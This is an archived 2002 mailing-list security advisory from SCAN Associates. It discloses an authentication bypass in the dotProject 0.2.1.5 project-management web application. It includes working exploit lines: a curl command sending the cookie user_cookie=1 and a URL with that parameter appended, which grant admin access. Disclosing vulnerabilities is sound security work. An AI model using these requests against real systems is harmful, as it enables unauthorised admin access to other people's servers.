OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: pokleyzz (pokleyzz_at_scan-associates.net)
Date: Sun Jul 28 2002 - 22:19:14 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    SCAN Associates Sdn Bhd Security Advisory

    Product: dotProject 0.2.1.5 (possibly other)

    Vendor URL: http://www.dotmarketing.org/dotproject/

    Summary: php dotProject by pass authentication

    Author: pokleyzz <pokleyzzscan-associates.net>, sk <skscan-associates.net>,
    shaharil <shaharilscan-associates.net>

    Description
    ===========
    dotProject is web base project management system .
    This application consider as beta version.

    Details
    =======
    Everyone can bypass authentication and login as Admin.
    It was rather simple to exploit, user may send a crafted cookie like:

    curl -b user_cookie=1 http://server/project/index.php?m=projects

    Or simply append user_cookie=1 in any URL:

    http://server/project/index.php?m=projects&user_cookie=1

    Vendor Response
    ===============
    Vendor has been contacted on 24/7/2002 but no reply.

    www.scan-associates.net <http://www.scan-associates.net>